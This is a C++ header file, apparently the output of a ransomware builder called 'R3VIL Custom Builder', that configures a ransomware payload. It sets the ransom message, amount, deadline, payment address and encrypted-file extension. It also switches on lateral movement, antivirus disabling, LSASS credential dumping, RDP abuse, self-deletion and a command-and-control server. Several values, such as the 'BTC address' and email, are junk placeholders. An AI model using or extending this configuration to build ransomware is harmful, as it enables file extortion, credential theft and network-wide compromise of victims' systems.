// config.h - Generated by R3VIL Custom Builder
#pragma once

#include <string>

const std::string RANSOM_BTC = "48382882292";
const std::string RANSOM_EMAIL = "r8eejeje";
const double RANSOM_AMOUNT = 9.50403e+08;
const int RANSOM_DEADLINE_HOURS = 48;
const std::string RANSOM_MESSAGE = "Your files have been encrypted with military grade encryption.";
const std::string WINDOW_TITLE = "R3VIL Ransomware";
const std::string ENCRYPTION_METHOD = "XChaCha20Poly1305";
const std::string FILE_EXTENSION = ".idiot";
const std::string OUTPUT_NAME = "idiot";
const bool ENABLE_LATERAL_MOVEMENT = true;
const bool ENABLE_AV_DISABLE = true;
const bool SELF_DELETE_AFTER = true;
const bool ENABLE_LSASS_DUMP = true;
const bool ENABLE_RDP_ABUSE = true;
const std::string C2_SERVER = "http://127.0.0.1:5000/";
const bool ENABLE_C2 = true;
